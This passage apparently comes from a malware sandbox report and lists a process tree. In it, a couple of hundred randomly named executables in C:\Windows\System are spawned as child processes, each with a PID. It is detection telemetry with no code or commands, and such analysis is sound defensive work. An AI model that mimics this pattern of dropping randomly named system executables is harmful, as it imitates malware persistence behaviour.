- C:\Windows\System\QybYGvO.exe
  C:\Windows\System\QybYGvO.exe
  2⤵
  PID:8852
- C:\Windows\System\ggiwfHW.exe
  C:\Windows\System\ggiwfHW.exe
  2⤵
  PID:8884
- C:\Windows\System\uxZlTxf.exe
  C:\Windows\System\uxZlTxf.exe
  2⤵
  PID:7948
- C:\Windows\System\wBYSXHa.exe
  C:\Windows\System\wBYSXHa.exe
  2⤵
  PID:7452
- C:\Windows\System\QVcVIpH.exe
  C:\Windows\System\QVcVIpH.exe
  2⤵
  PID:7524
- C:\Windows\System\ZExpwcD.exe
  C:\Windows\System\ZExpwcD.exe
  2⤵
  PID:9012
- C:\Windows\System\xISQaKO.exe
  C:\Windows\System\xISQaKO.exe
  2⤵
  PID:7624
- C:\Windows\System\leFnpHj.exe
  C:\Windows\System\leFnpHj.exe
  2⤵
  PID:7684
- C:\Windows\System\bzRXFZh.exe
  C:\Windows\System\bzRXFZh.exe
  2⤵
  PID:8576
- C:\Windows\System\mwUJqfq.exe
  C:\Windows\System\mwUJqfq.exe
  2⤵
  PID:7764
- C:\Windows\System\XoemwMY.exe
  C:\Windows\System\XoemwMY.exe
  2⤵
  PID:7824
- C:\Windows\System\GAvNnSM.exe
  C:\Windows\System\GAvNnSM.exe
  2⤵
  PID:9112
- C:\Windows\System\zNoBMqs.exe
  C:\Windows\System\zNoBMqs.exe
  2⤵
  PID:7560
- C:\Windows\System\xaZOPnI.exe
  C:\Windows\System\xaZOPnI.exe
  2⤵
  PID:8080
- C:\Windows\System\TXDDCQB.exe
  C:\Windows\System\TXDDCQB.exe
  2⤵
  PID:8184
- C:\Windows\System\vIKooKU.exe
  C:\Windows\System\vIKooKU.exe
  2⤵
  PID:7000
- C:\Windows\System\zwhHqOQ.exe
  C:\Windows\System\zwhHqOQ.exe
  2⤵
  PID:6080
- C:\Windows\System\jcjZhAG.exe
  C:\Windows\System\jcjZhAG.exe
  2⤵
  PID:7720
- C:\Windows\System\GnMHTjZ.exe
  C:\Windows\System\GnMHTjZ.exe
  2⤵
  PID:6344
- C:\Windows\System\sUXNGuP.exe
  C:\Windows\System\sUXNGuP.exe
  2⤵
  PID:7284
- C:\Windows\System\CGWARTe.exe
  C:\Windows\System\CGWARTe.exe
  2⤵
  PID:9224
- C:\Windows\System\RdbViLH.exe
  C:\Windows\System\RdbViLH.exe
  2⤵
  PID:9324
- C:\Windows\System\uuEyhRG.exe
  C:\Windows\System\uuEyhRG.exe
  2⤵
  PID:9364
- C:\Windows\System\leMbiNr.exe
  C:\Windows\System\leMbiNr.exe
  2⤵
  PID:9440
- C:\Windows\System\oFSpzLf.exe
  C:\Windows\System\oFSpzLf.exe
  2⤵
  PID:9496
- C:\Windows\System\husmPld.exe
  C:\Windows\System\husmPld.exe
  2⤵
  PID:7904
- C:\Windows\System\ZqrvMpK.exe
  C:\Windows\System\ZqrvMpK.exe
  2⤵
  PID:8804
- C:\Windows\System\aYTePul.exe
  C:\Windows\System\aYTePul.exe
  2⤵
  PID:5156
- C:\Windows\System\lfmkEbb.exe
  C:\Windows\System\lfmkEbb.exe
  2⤵
  PID:8860
- C:\Windows\System\BlhBSMb.exe
  C:\Windows\System\BlhBSMb.exe
  2⤵
  PID:9688
- C:\Windows\System\OATxYlG.exe
  C:\Windows\System\OATxYlG.exe
  2⤵
  PID:9028
- C:\Windows\System\gGqOVSC.exe
  C:\Windows\System\gGqOVSC.exe
  2⤵
  PID:9180
- C:\Windows\System\mXUpzEy.exe
  C:\Windows\System\mXUpzEy.exe
  2⤵
  PID:8668
- C:\Windows\System\ehUXdGZ.exe
  C:\Windows\System\ehUXdGZ.exe
  2⤵
  PID:1032
- C:\Windows\System\yPlcjuo.exe
  C:\Windows\System\yPlcjuo.exe
  2⤵
  PID:9908
- C:\Windows\System\wagrnvd.exe
  C:\Windows\System\wagrnvd.exe
  2⤵
  PID:7228
- C:\Windows\System\xlpTJhr.exe
  C:\Windows\System\xlpTJhr.exe
  2⤵
  PID:8036
- C:\Windows\System\yMyxPig.exe
  C:\Windows\System\yMyxPig.exe
  2⤵
  PID:9992
- C:\Windows\System\aoAjRiW.exe
  C:\Windows\System\aoAjRiW.exe
  2⤵
  PID:8400
- C:\Windows\System\ZGkUGKJ.exe
  C:\Windows\System\ZGkUGKJ.exe
  2⤵
  PID:7784
- C:\Windows\System\QDOvIza.exe
  C:\Windows\System\QDOvIza.exe
  2⤵
  PID:5872
- C:\Windows\System\FuqrFMQ.exe
  C:\Windows\System\FuqrFMQ.exe
  2⤵
  PID:10244
- C:\Windows\System\ngvxWfN.exe
  C:\Windows\System\ngvxWfN.exe
  2⤵
  PID:10264
- C:\Windows\System\VjdFeUe.exe
  C:\Windows\System\VjdFeUe.exe
  2⤵
  PID:10280
- C:\Windows\System\bINYOoP.exe
  C:\Windows\System\bINYOoP.exe
  2⤵
  PID:10304
- C:\Windows\System\iYwIHee.exe
  C:\Windows\System\iYwIHee.exe
  2⤵
  PID:10328
- C:\Windows\System\ATfewty.exe
  C:\Windows\System\ATfewty.exe
  2⤵
  PID:10344
- C:\Windows\System\CaLrLeC.exe
  C:\Windows\System\CaLrLeC.exe
  2⤵
  PID:10368
- C:\Windows\System\IxjdoNa.exe
  C:\Windows\System\IxjdoNa.exe
  2⤵
  PID:10392
- C:\Windows\System\woCnRQy.exe
  C:\Windows\System\woCnRQy.exe
  2⤵
  PID:10416
- C:\Windows\System\fnxLUOU.exe
  C:\Windows\System\fnxLUOU.exe
  2⤵
  PID:10436
- C:\Windows\System\ANxMyJZ.exe
  C:\Windows\System\ANxMyJZ.exe
  2⤵
  PID:10456
- C:\Windows\System\nkWDKoT.exe
  C:\Windows\System\nkWDKoT.exe
  2⤵
  PID:10480
- C:\Windows\System\AXIytKO.exe
  C:\Windows\System\AXIytKO.exe
  2⤵
  PID:10508
- C:\Windows\System\pCtCdjR.exe
  C:\Windows\System\pCtCdjR.exe
  2⤵
  PID:10524
- C:\Windows\System\zYEdxFn.exe
  C:\Windows\System\zYEdxFn.exe
  2⤵
  PID:10548
- C:\Windows\System\PlUUoyG.exe
  C:\Windows\System\PlUUoyG.exe
  2⤵
  PID:10568
- C:\Windows\System\fcGxjII.exe
  C:\Windows\System\fcGxjII.exe
  2⤵
  PID:10588
- C:\Windows\System\HSYASWF.exe
  C:\Windows\System\HSYASWF.exe
  2⤵
  PID:10624
- C:\Windows\System\RfXpYkh.exe
  C:\Windows\System\RfXpYkh.exe
  2⤵
  PID:10644
- C:\Windows\System\URpEcqB.exe
  C:\Windows\System\URpEcqB.exe
  2⤵
  PID:10668
- C:\Windows\System\IphMgIs.exe
  C:\Windows\System\IphMgIs.exe
  2⤵
  PID:10696
- C:\Windows\System\qNvxFox.exe
  C:\Windows\System\qNvxFox.exe
  2⤵
  PID:10712
- C:\Windows\System\dIklVii.exe
  C:\Windows\System\dIklVii.exe
  2⤵
  PID:10736
- C:\Windows\System\GFGXYam.exe
  C:\Windows\System\GFGXYam.exe
  2⤵
  PID:10756
- C:\Windows\System\GTfjbGx.exe
  C:\Windows\System\GTfjbGx.exe
  2⤵
  PID:10776
- C:\Windows\System\QlCXocB.exe
  C:\Windows\System\QlCXocB.exe
  2⤵
  PID:10796
- C:\Windows\System\aJiIxmX.exe
  C:\Windows\System\aJiIxmX.exe
  2⤵
  PID:10816
- C:\Windows\System\crekCMK.exe
  C:\Windows\System\crekCMK.exe
  2⤵
  PID:10840
- C:\Windows\System\kEBeRFz.exe
  C:\Windows\System\kEBeRFz.exe
  2⤵
  PID:10860
- C:\Windows\System\RMnLIyj.exe
  C:\Windows\System\RMnLIyj.exe
  2⤵
  PID:10884
- C:\Windows\System\xYSMDLw.exe
  C:\Windows\System\xYSMDLw.exe
  2⤵
  PID:10900
- C:\Windows\System\smWeYkk.exe
  C:\Windows\System\smWeYkk.exe
  2⤵
  PID:10924
- C:\Windows\System\xQiuzMP.exe
  C:\Windows\System\xQiuzMP.exe
  2⤵
  PID:10940
- C:\Windows\System\tTMwBqw.exe
  C:\Windows\System\tTMwBqw.exe
  2⤵
  PID:10960
- C:\Windows\System\UUHuHrO.exe
  C:\Windows\System\UUHuHrO.exe
  2⤵
  PID:10984
- C:\Windows\System\eaPgdax.exe
  C:\Windows\System\eaPgdax.exe
  2⤵
  PID:11004
- C:\Windows\System\eJovtig.exe
  C:\Windows\System\eJovtig.exe
  2⤵
  PID:11024
- C:\Windows\System\qrmKpbB.exe
  C:\Windows\System\qrmKpbB.exe
  2⤵
  PID:11044
- C:\Windows\System\bKwqBty.exe
  C:\Windows\System\bKwqBty.exe
  2⤵
  PID:11064
- C:\Windows\System\VRKSiMN.exe
  C:\Windows\System\VRKSiMN.exe
  2⤵
  PID:11084
- C:\Windows\System\BHbwbPP.exe
  C:\Windows\System\BHbwbPP.exe
  2⤵
  PID:11112
- C:\Windows\System\CJVtoed.exe
  C:\Windows\System\CJVtoed.exe
  2⤵
  PID:11136
- C:\Windows\System\efPwWIJ.exe
  C:\Windows\System\efPwWIJ.exe
  2⤵
  PID:11160
- C:\Windows\System\cHpIlic.exe
  C:\Windows\System\cHpIlic.exe
  2⤵
  PID:11176
- C:\Windows\System\gwNTwRj.exe
  C:\Windows\System\gwNTwRj.exe
  2⤵
  PID:11204
- C:\Windows\System\XBoFCcY.exe
  C:\Windows\System\XBoFCcY.exe
  2⤵
  PID:11224
- C:\Windows\System\nqBYsAC.exe
  C:\Windows\System\nqBYsAC.exe
  2⤵
  PID:11244
- C:\Windows\System\pUOkCSL.exe
  C:\Windows\System\pUOkCSL.exe
  2⤵
  PID:7480
- C:\Windows\System\ogwudpf.exe
  C:\Windows\System\ogwudpf.exe
  2⤵
  PID:8500
- C:\Windows\System\EjscHRU.exe
  C:\Windows\System\EjscHRU.exe
  2⤵
  PID:9052
- C:\Windows\System\yknlHnh.exe
  C:\Windows\System\yknlHnh.exe
  2⤵
  PID:8816
- C:\Windows\System\YEbkzEU.exe
  C:\Windows\System\YEbkzEU.exe
  2⤵
  PID:7900
- C:\Windows\System\YiMGpCq.exe
  C:\Windows\System\YiMGpCq.exe
  2⤵
  PID:8912
- C:\Windows\System\QbLvKKK.exe
  C:\Windows\System\QbLvKKK.exe
  2⤵
  PID:7804
- C:\Windows\System\bksRHWL.exe
  C:\Windows\System\bksRHWL.exe
  2⤵
  PID:9648
- C:\Windows\System\lAFdOjp.exe
  C:\Windows\System\lAFdOjp.exe
  2⤵
  PID:5408
- C:\Windows\System\HWlJkDg.exe
  C:\Windows\System\HWlJkDg.exe
  2⤵
  PID:5272
- C:\Windows\System\BmUUWKF.exe
  C:\Windows\System\BmUUWKF.exe
  2⤵
  PID:9320
- C:\Windows\System\gWlgAvG.exe
  C:\Windows\System\gWlgAvG.exe
  2⤵
  PID:9460
- C:\Windows\System\ZMjOrOf.exe
  C:\Windows\System\ZMjOrOf.exe
  2⤵
  PID:1192
- C:\Windows\System\tBSFmSK.exe
  C:\Windows\System\tBSFmSK.exe
  2⤵
  PID:9736
- C:\Windows\System\hIUpDSj.exe
  C:\Windows\System\hIUpDSj.exe
  2⤵
  PID:9792
- C:\Windows\System\zzTDPGM.exe
  C:\Windows\System\zzTDPGM.exe
  2⤵
  PID:9000
- C:\Windows\System\HPCAPzK.exe
  C:\Windows\System\HPCAPzK.exe
  2⤵
  PID:7068
- C:\Windows\System\BMkdvEE.exe
  C:\Windows\System\BMkdvEE.exe
  2⤵
  PID:8660
- C:\Windows\System\tMBXvne.exe
  C:\Windows\System\tMBXvne.exe
  2⤵
  PID:9892
- C:\Windows\System\fRHQQRO.exe
  C:\Windows\System\fRHQQRO.exe
  2⤵
  PID:9928
- C:\Windows\System\HXqgJAW.exe
  C:\Windows\System\HXqgJAW.exe
  2⤵
  PID:11268
- C:\Windows\System\RSFSohO.exe
  C:\Windows\System\RSFSohO.exe
  2⤵
  PID:11292
- C:\Windows\System\oCfqNTQ.exe
  C:\Windows\System\oCfqNTQ.exe
  2⤵
  PID:11316
- C:\Windows\System\KtElEYR.exe
  C:\Windows\System\KtElEYR.exe
  2⤵
  PID:11336
- C:\Windows\System\CUpsSDR.exe
  C:\Windows\System\CUpsSDR.exe
  2⤵
  PID:11356
- C:\Windows\System\NnRVXQX.exe
  C:\Windows\System\NnRVXQX.exe
  2⤵
  PID:11376
- C:\Windows\System\dkFrfUX.exe
  C:\Windows\System\dkFrfUX.exe
  2⤵
  PID:11408
- C:\Windows\System\RYEteUT.exe
  C:\Windows\System\RYEteUT.exe
  2⤵
  PID:11428
- C:\Windows\System\hXafymS.exe
  C:\Windows\System\hXafymS.exe
  2⤵
  PID:11452
- C:\Windows\System\JASbYWf.exe
  C:\Windows\System\JASbYWf.exe
  2⤵
  PID:11472
- C:\Windows\System\sRAsRPn.exe
  C:\Windows\System\sRAsRPn.exe
  2⤵
  PID:11504
- C:\Windows\System\ibbkigF.exe
  C:\Windows\System\ibbkigF.exe
  2⤵
  PID:11524
- C:\Windows\System\XwTCuem.exe
  C:\Windows\System\XwTCuem.exe
  2⤵
  PID:11544
- C:\Windows\System\zpOeHTg.exe
  C:\Windows\System\zpOeHTg.exe
  2⤵
  PID:11564
- C:\Windows\System\VcmiigA.exe
  C:\Windows\System\VcmiigA.exe
  2⤵
  PID:11584
- C:\Windows\System\hGAUWRz.exe
  C:\Windows\System\hGAUWRz.exe
  2⤵
  PID:11608
- C:\Windows\System\sdMOhIF.exe
  C:\Windows\System\sdMOhIF.exe
  2⤵
  PID:11632
- C:\Windows\System\YSGGGCy.exe
  C:\Windows\System\YSGGGCy.exe
  2⤵
  PID:11656
- C:\Windows\System\pmAEIhn.exe
  C:\Windows\System\pmAEIhn.exe
  2⤵
  PID:11672
- C:\Windows\System\kYSQIPR.exe
  C:\Windows\System\kYSQIPR.exe
  2⤵
  PID:11696
- C:\Windows\System\GksQxFP.exe
  C:\Windows\System\GksQxFP.exe
  2⤵
  PID:11720
- C:\Windows\System\GQWMOgp.exe
  C:\Windows\System\GQWMOgp.exe
  2⤵
  PID:11740
- C:\Windows\System\JXfVmgh.exe
  C:\Windows\System\JXfVmgh.exe
  2⤵
  PID:11760
- C:\Windows\System\uxpkVSZ.exe
  C:\Windows\System\uxpkVSZ.exe
  2⤵
  PID:11784
- C:\Windows\System\jPIfFPL.exe
  C:\Windows\System\jPIfFPL.exe
  2⤵
  PID:11812
- C:\Windows\System\DrOzEHx.exe
  C:\Windows\System\DrOzEHx.exe
  2⤵
  PID:11832
- C:\Windows\System\PMJoNsk.exe
  C:\Windows\System\PMJoNsk.exe
  2⤵
  PID:11860
- C:\Windows\System\pfXIWzi.exe
  C:\Windows\System\pfXIWzi.exe
  2⤵
  PID:11880
- C:\Windows\System\aalKfhE.exe
  C:\Windows\System\aalKfhE.exe
  2⤵
  PID:11904
- C:\Windows\System\mAidqkh.exe
  C:\Windows\System\mAidqkh.exe
  2⤵
  PID:11924
- C:\Windows\System\ixHminv.exe
  C:\Windows\System\ixHminv.exe
  2⤵
  PID:11940
- C:\Windows\System\HBZRLGQ.exe
  C:\Windows\System\HBZRLGQ.exe
  2⤵
  PID:11968
- C:\Windows\System\clVVjqX.exe
  C:\Windows\System\clVVjqX.exe
  2⤵
  PID:11988
- C:\Windows\System\CXjLxJf.exe
  C:\Windows\System\CXjLxJf.exe
  2⤵
  PID:12004
- C:\Windows\System\uUaCAYZ.exe
  C:\Windows\System\uUaCAYZ.exe
  2⤵
  PID:12028
- C:\Windows\System\znZAUNX.exe
  C:\Windows\System\znZAUNX.exe
  2⤵
  PID:12056
- C:\Windows\System\nTiqIFq.exe
  C:\Windows\System\nTiqIFq.exe
  2⤵
  PID:12076
- C:\Windows\System\RGRJlMj.exe
  C:\Windows\System\RGRJlMj.exe
  2⤵
  PID:12108
- C:\Windows\System\sBTHadn.exe
  C:\Windows\System\sBTHadn.exe
  2⤵
  PID:12132
- C:\Windows\System\eedICxg.exe
  C:\Windows\System\eedICxg.exe
  2⤵
  PID:12152
- C:\Windows\System\mrUEmOx.exe
  C:\Windows\System\mrUEmOx.exe
  2⤵
  PID:12176
- C:\Windows\System\ZnqcxDx.exe
  C:\Windows\System\ZnqcxDx.exe
  2⤵
  PID:12200
- C:\Windows\System\lEFPmpm.exe
  C:\Windows\System\lEFPmpm.exe
  2⤵
  PID:12220
- C:\Windows\System\UYBkUUT.exe
  C:\Windows\System\UYBkUUT.exe
  2⤵
  PID:12248
- C:\Windows\System\zbjxvzM.exe
  C:\Windows\System\zbjxvzM.exe
  2⤵
  PID:12268
- C:\Windows\System\kKtluPg.exe
  C:\Windows\System\kKtluPg.exe
  2⤵
  PID:6792
- C:\Windows\System\WyaFkQs.exe
  C:\Windows\System\WyaFkQs.exe
  2⤵
  PID:5956
- C:\Windows\System\eZBJmUp.exe
  C:\Windows\System\eZBJmUp.exe
  2⤵
  PID:7456
- C:\Windows\System\uYzUXhb.exe
  C:\Windows\System\uYzUXhb.exe
  2⤵
  PID:2360
- C:\Windows\System\anQWloz.exe
  C:\Windows\System\anQWloz.exe
  2⤵
  PID:9268
- C:\Windows\System\YGJDqaG.exe
  C:\Windows\System\YGJDqaG.exe
  2⤵
  PID:10260
- C:\Windows\System\twrMnGM.exe
  C:\Windows\System\twrMnGM.exe
  2⤵
  PID:10324
- C:\Windows\System\FNcOtsg.exe
  C:\Windows\System\FNcOtsg.exe
  2⤵
  PID:10388
- C:\Windows\System\xOrgzGv.exe
  C:\Windows\System\xOrgzGv.exe
  2⤵
  PID:10448
- C:\Windows\System\ILIHayk.exe
  C:\Windows\System\ILIHayk.exe
  2⤵
  PID:10540
- C:\Windows\System\CmfLEBw.exe
  C:\Windows\System\CmfLEBw.exe
  2⤵
  PID:10664
- C:\Windows\System\TWCoXsR.exe
  C:\Windows\System\TWCoXsR.exe
  2⤵
  PID:10772
- C:\Windows\System\gljONOl.exe
  C:\Windows\System\gljONOl.exe
  2⤵
  PID:8868
- C:\Windows\System\KcCpHiE.exe
  C:\Windows\System\KcCpHiE.exe
  2⤵
  PID:10880
- C:\Windows\System\YaSJJnW.exe
  C:\Windows\System\YaSJJnW.exe
  2⤵
  PID:7884
- C:\Windows\System\IsdPlqB.exe
  C:\Windows\System\IsdPlqB.exe
  2⤵
  PID:11000
- C:\Windows\System\nHRRwon.exe
  C:\Windows\System\nHRRwon.exe
  2⤵
  PID:9452
- C:\Windows\System\CzgNhfq.exe
  C:\Windows\System\CzgNhfq.exe
  2⤵
  PID:11056
- C:\Windows\System\HEKvFbu.exe
  C:\Windows\System\HEKvFbu.exe
  2⤵
  PID:6960
- C:\Windows\System\HGSMdUw.exe
  C:\Windows\System\HGSMdUw.exe
  2⤵
  PID:12304
- C:\Windows\System\GbnkPND.exe
  C:\Windows\System\GbnkPND.exe
  2⤵
  PID:12320
- C:\Windows\System\htwfmoe.exe
  C:\Windows\System\htwfmoe.exe
  2⤵
  PID:12336
- C:\Windows\System\NEirLqr.exe
  C:\Windows\System\NEirLqr.exe
  2⤵
  PID:12352
- C:\Windows\System\ZANNiHE.exe
  C:\Windows\System\ZANNiHE.exe
  2⤵
  PID:12372
- C:\Windows\System\oTGAZLf.exe
  C:\Windows\System\oTGAZLf.exe
  2⤵
  PID:12388
- C:\Windows\System\BocyUgN.exe
  C:\Windows\System\BocyUgN.exe
  2⤵
  PID:12404
- C:\Windows\System\IAFwtSC.exe
  C:\Windows\System\IAFwtSC.exe
  2⤵
  PID:12424
- C:\Windows\System\vkJPDQg.exe
  C:\Windows\System\vkJPDQg.exe
  2⤵
  PID:12444
- C:\Windows\System\ecHpJDe.exe
  C:\Windows\System\ecHpJDe.exe
  2⤵
  PID:12472
- C:\Windows\System\NVAIUuN.exe
  C:\Windows\System\NVAIUuN.exe
  2⤵
  PID:12500
- C:\Windows\System\ttVycwV.exe
  C:\Windows\System\ttVycwV.exe
  2⤵
  PID:12520
- C:\Windows\System\wffOLAT.exe
  C:\Windows\System\wffOLAT.exe
  2⤵
  PID:12540
- C:\Windows\System\XFIuWFj.exe
  C:\Windows\System\XFIuWFj.exe
  2⤵
  PID:12564
- C:\Windows\System\LprCrCR.exe
  C:\Windows\System\LprCrCR.exe
  2⤵
  PID:12584
- C:\Windows\System\KRDdbAh.exe
  C:\Windows\System\KRDdbAh.exe
  2⤵
  PID:12604
- C:\Windows\System\IgWYAtv.exe
  C:\Windows\System\IgWYAtv.exe
  2⤵
  PID:12632
- C:\Windows\System\cpkwshi.exe
  C:\Windows\System\cpkwshi.exe
  2⤵
  PID:12652
- C:\Windows\System\tLrgOwB.exe
  C:\Windows\System\tLrgOwB.exe
  2⤵
  PID:12672
- C:\Windows\System\huZTYKW.exe
  C:\Windows\System\huZTYKW.exe
  2⤵
  PID:12688
- C:\Windows\System\aQMTSCI.exe
  C:\Windows\System\aQMTSCI.exe
  2⤵
  PID:12708
- C:\Windows\System\mNMGgUE.exe
  C:\Windows\System\mNMGgUE.exe
  2⤵
  PID:12732
- C:\Windows\System\lsJXhFz.exe
  C:\Windows\System\lsJXhFz.exe
  2⤵
  PID:12756
- C:\Windows\System\CivaBKn.exe
  C:\Windows\System\CivaBKn.exe
  2⤵
  PID:12784
- C:\Windows\System\NGbBuMq.exe
  C:\Windows\System\NGbBuMq.exe
  2⤵
  PID:12804
- C:\Windows\System\QwLngeS.exe
  C:\Windows\System\QwLngeS.exe
  2⤵
  PID:12828
- C:\Windows\System\KJaDdAm.exe
  C:\Windows\System\KJaDdAm.exe
  2⤵
  PID:12844
- C:\Windows\System\wWToLRf.exe
  C:\Windows\System\wWToLRf.exe
  2⤵
  PID:12868
- C:\Windows\System\NXugRFX.exe
  C:\Windows\System\NXugRFX.exe
  2⤵
  PID:12884
- C:\Windows\System\stImVLG.exe
  C:\Windows\System\stImVLG.exe
  2⤵
  PID:12908
- C:\Windows\System\rZtIEyX.exe
  C:\Windows\System\rZtIEyX.exe
  2⤵
  PID:12936
- C:\Windows\System\vmmeeAu.exe
  C:\Windows\System\vmmeeAu.exe
  2⤵
  PID:12952
- C:\Windows\System\xSQrWfo.exe
  C:\Windows\System\xSQrWfo.exe
  2⤵
  PID:12976
- C:\Windows\System\uTzjWxj.exe
  C:\Windows\System\uTzjWxj.exe
  2⤵
  PID:13004
- C:\Windows\System\MWVEOsV.exe
  C:\Windows\System\MWVEOsV.exe
  2⤵
  PID:13024
- C:\Windows\System\lfLGHWd.exe
  C:\Windows\System\lfLGHWd.exe
  2⤵
  PID:13044
- C:\Windows\System\XpjwSlv.exe
  C:\Windows\System\XpjwSlv.exe
  2⤵
  PID:13076
- C:\Windows\System\mCZfKMw.exe
  C:\Windows\System\mCZfKMw.exe
  2⤵
  PID:13096
- C:\Windows\System\ZGhCiAC.exe
  C:\Windows\System\ZGhCiAC.exe
  2⤵
  PID:12972
- C:\Windows\System\BgPUssx.exe
  C:\Windows\System\BgPUssx.exe
  2⤵
  PID:11352
- C:\Windows\System\reJOaeO.exe
  C:\Windows\System\reJOaeO.exe
  2⤵
  PID:13020
- C:\Windows\System\VfGuCNV.exe
  C:\Windows\System\VfGuCNV.exe
  2⤵
  PID:11288
- C:\Windows\System\EAUmmkd.exe
  C:\Windows\System\EAUmmkd.exe
  2⤵
  PID:10196
- C:\Windows\System\GMaXNue.exe
  C:\Windows\System\GMaXNue.exe
  2⤵
  PID:12412
- C:\Windows\System\BLUWJiH.exe
  C:\Windows\System\BLUWJiH.exe
  2⤵
  PID:12548
- C:\Windows\System\pjVpqfI.exe
  C:\Windows\System\pjVpqfI.exe
  2⤵
  PID:12596
- C:\Windows\System\YEUTscy.exe
  C:\Windows\System\YEUTscy.exe
  2⤵
  PID:8952
- C:\Windows\System\VmuQsFo.exe
  C:\Windows\System\VmuQsFo.exe
  2⤵
  PID:3608
- C:\Windows\System\faCjRRR.exe
  C:\Windows\System\faCjRRR.exe
  2⤵
  PID:12684
- C:\Windows\System\uZUcjUX.exe
  C:\Windows\System\uZUcjUX.exe
  2⤵
  PID:12996
- C:\Windows\System\iUeOZcs.exe
  C:\Windows\System\iUeOZcs.exe
  2⤵
  PID:13068
- C:\Windows\System\DmBoNcX.exe
  C:\Windows\System\DmBoNcX.exe
  2⤵
  PID:9200
- C:\Windows\System\MvMbMby.exe
  C:\Windows\System\MvMbMby.exe
  2⤵
  PID:12496
- C:\Windows\System\NYFzFYd.exe
  C:\Windows\System\NYFzFYd.exe
  2⤵
  PID:5944
- C:\Windows\System\vCQIUZe.exe
  C:\Windows\System\vCQIUZe.exe
  2⤵
  PID:11444
- C:\Windows\System\MSivFAd.exe
  C:\Windows\System\MSivFAd.exe
  2⤵
  PID:11368
- C:\Windows\System\jpetBGP.exe
  C:\Windows\System\jpetBGP.exe
  2⤵
  PID:11300
- C:\Windows\System\FLbJUGo.exe
  C:\Windows\System\FLbJUGo.exe
  2⤵
  PID:13200
- C:\Windows\System\ZTRXGlN.exe
  C:\Windows\System\ZTRXGlN.exe
  2⤵
  PID:11284
- C:\Windows\System\quljUgA.exe
  C:\Windows\System\quljUgA.exe
  2⤵
  PID:12100
- C:\Windows\System\HYMqwfx.exe
  C:\Windows\System\HYMqwfx.exe
  2⤵
  PID:12064
- C:\Windows\System\NXnzSrf.exe
  C:\Windows\System\NXnzSrf.exe
  2⤵
  PID:11484
- C:\Windows\System\DtOAkXj.exe
  C:\Windows\System\DtOAkXj.exe
  2⤵
  PID:10876
- C:\Windows\System\kVlpkwe.exe
  C:\Windows\System\kVlpkwe.exe
  2⤵
  PID:10500
- C:\Windows\System\kfFKEqK.exe
  C:\Windows\System\kfFKEqK.exe
  2⤵
  PID:10032
- C:\Windows\System\IqUlRCZ.exe
  C:\Windows\System\IqUlRCZ.exe
  2⤵
  PID:10764
- C:\Windows\System\wNmmiNh.exe
  C:\Windows\System\wNmmiNh.exe
  2⤵
  PID:10580
- C:\Windows\System\BALECkl.exe
  C:\Windows\System\BALECkl.exe
  2⤵
  PID:11936
- C:\Windows\System\whMPURP.exe
  C:\Windows\System\whMPURP.exe
  2⤵
  PID:11856
- C:\Windows\System\CWiBQvO.exe
  C:\Windows\System\CWiBQvO.exe
  2⤵
  PID:10312
- C:\Windows\System\ZGovtaB.exe
  C:\Windows\System\ZGovtaB.exe
  2⤵
  PID:11520
- C:\Windows\System\qcvSurx.exe
  C:\Windows\System\qcvSurx.exe
  2⤵
  PID:13056
- C:\Windows\System\MAHaMjp.exe
  C:\Windows\System\MAHaMjp.exe
  2⤵
  PID:11020
- C:\Windows\System\uipXHBq.exe
  C:\Windows\System\uipXHBq.exe
  2⤵
  PID:5964
- C:\Windows\System\sNzJeol.exe
  C:\Windows\System\sNzJeol.exe
  2⤵
  PID:12332
- C:\Windows\System\cEzaTIa.exe
  C:\Windows\System\cEzaTIa.exe
  2⤵
  PID:11712
- C:\Windows\System\RZtZQGP.exe
  C:\Windows\System\RZtZQGP.exe
  2⤵
  PID:9924
- C:\Windows\System\iTPiJCi.exe
  C:\Windows\System\iTPiJCi.exe
  2⤵
  PID:11096
- C:\Windows\System\yEYpIxO.exe
  C:\Windows\System\yEYpIxO.exe
  2⤵
  PID:12348
- C:\Windows\System\CKRClNt.exe
  C:\Windows\System\CKRClNt.exe
  2⤵
  PID:10444
- C:\Windows\System\ksDxbAt.exe
  C:\Windows\System\ksDxbAt.exe
  2⤵
  PID:12928
- C:\Windows\System\mYxHWIy.exe
  C:\Windows\System\mYxHWIy.exe
  2⤵
  PID:10804
- C:\Windows\System\pgnFBwz.exe
  C:\Windows\System\pgnFBwz.exe
  2⤵
  PID:8168
- C:\Windows\System\SroYmKF.exe
  C:\Windows\System\SroYmKF.exe
  2⤵
  PID:8532
- C:\Windows\System\fBTJbWa.exe
  C:\Windows\System\fBTJbWa.exe
  2⤵
  PID:11436
- C:\Windows\System\OMUNZpp.exe
  C:\Windows\System\OMUNZpp.exe
  2⤵
  PID:12592
- C:\Windows\System\KGUlENm.exe
  C:\Windows\System\KGUlENm.exe
  2⤵
  PID:8908
- C:\Windows\System\rskCMge.exe
  C:\Windows\System\rskCMge.exe
  2⤵
  PID:7924
- C:\Windows\System\FShPLMF.exe
  C:\Windows\System\FShPLMF.exe
  2⤵
  PID:12280
- C:\Windows\System\TRWIaRF.exe
  C:\Windows\System\TRWIaRF.exe
  2⤵
  PID:12116
- C:\Windows\System\pVzccNn.exe
  C:\Windows\System\pVzccNn.exe
  2⤵
  PID:10464
- C:\Windows\System\CKJSlSO.exe
  C:\Windows\System\CKJSlSO.exe
  2⤵
  PID:7732
- C:\Windows\System\iGvIspf.exe
  C:\Windows\System\iGvIspf.exe
  2⤵
  PID:11920
- C:\Windows\System\qooHqnW.exe
  C:\Windows\System\qooHqnW.exe
  2⤵
  PID:12668
- C:\Windows\System\oOVOzPx.exe
  C:\Windows\System\oOVOzPx.exe
  2⤵
  PID:10532
- C:\Windows\System\OSrBrNJ.exe
  C:\Windows\System\OSrBrNJ.exe
  2⤵
  PID:13320
- C:\Windows\System\GEGOUsm.exe
  C:\Windows\System\GEGOUsm.exe
  2⤵
  PID:13340
- C:\Windows\System\ItpQMJD.exe
  C:\Windows\System\ItpQMJD.exe
  2⤵
  PID:13364
- C:\Windows\System\LXtFLoe.exe
  C:\Windows\System\LXtFLoe.exe
  2⤵
  PID:13412
- C:\Windows\System\dRzdtfv.exe
  C:\Windows\System\dRzdtfv.exe
  2⤵
  PID:13436
- C:\Windows\System\aAQnHhf.exe
  C:\Windows\System\aAQnHhf.exe
  2⤵
  PID:13464
- C:\Windows\System\RyfYWkQ.exe
  C:\Windows\System\RyfYWkQ.exe
  2⤵
  PID:13484
- C:\Windows\System\lSQvuOQ.exe
  C:\Windows\System\lSQvuOQ.exe
  2⤵
  PID:13504
- C:\Windows\System\idsCsit.exe
  C:\Windows\System\idsCsit.exe
  2⤵
  PID:13536
